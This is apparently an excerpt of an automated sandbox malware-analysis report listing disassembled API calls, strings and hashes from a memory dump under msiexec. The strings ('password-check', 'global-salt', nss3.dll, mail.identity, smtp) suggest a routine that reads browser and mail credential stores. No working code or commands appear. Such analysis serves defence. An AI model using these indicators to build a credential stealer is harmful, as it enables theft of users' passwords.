                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                            • strlen.MSVCRT ref: 004440D1
                                                                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                            • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                            Similarity
                                                                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 577244452-0
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040C02D
                                                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                            Similarity
                                                                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                            • API String ID: 2726666094-3614832568
                                                                                            APIs
                                                                                            • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                              • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                            • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                            • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                            • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                            Similarity
                                                                                            • API ID: memcmp$memcpy
                                                                                            • String ID: global-salt$password-check
                                                                                            • API String ID: 231171946-3927197501
                                                                                            APIs
                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                            Similarity
                                                                                            • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1189762176-0
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 004090C2
                                                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                            • String ID:
                                                                                            • API String ID: 4247780290-0
                                                                                            APIs
                                                                                            • _strcmpi.MSVCRT ref: 0040E134
                                                                                            • _strcmpi.MSVCRT ref: 0040E14D
                                                                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                            Similarity
                                                                                            • API ID: _strcmpi$_mbscpy
                                                                                            • String ID: smtp
                                                                                            • API String ID: 2625860049-60245459
                                                                                            APIs
                                                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                            Similarity
                                                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                            • String ID: MS Sans Serif
                                                                                            • API String ID: 3492281209-168460110
                                                                                            Similarity
                                                                                            • API ID: ClassName_strcmpimemset
                                                                                            • String ID: edit
                                                                                            • API String ID: 275601554-2167791130
                                                                                            Similarity
                                                                                            • API ID: _strcmpi
                                                                                            • String ID: C@$mail.identity
                                                                                            • API String ID: 1439213657-721921413
                                                                                            APIs
                                                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                            • sprintf.MSVCRT ref: 0040909B
                                                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                            Similarity
                                                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                            • String ID: menu_%d
                                                                                            • API String ID: 1129539653-2417748251
                                                                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                            APIs
                                                                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                            • _mbscat.MSVCRT ref: 004070FA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscat$_mbscpystrlen
                                                                                            • String ID: sqlite3.dll
                                                                                            • API String ID: 1983510840-1155512374
                                                                                            • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                            • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 3510742995-0
                                                                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8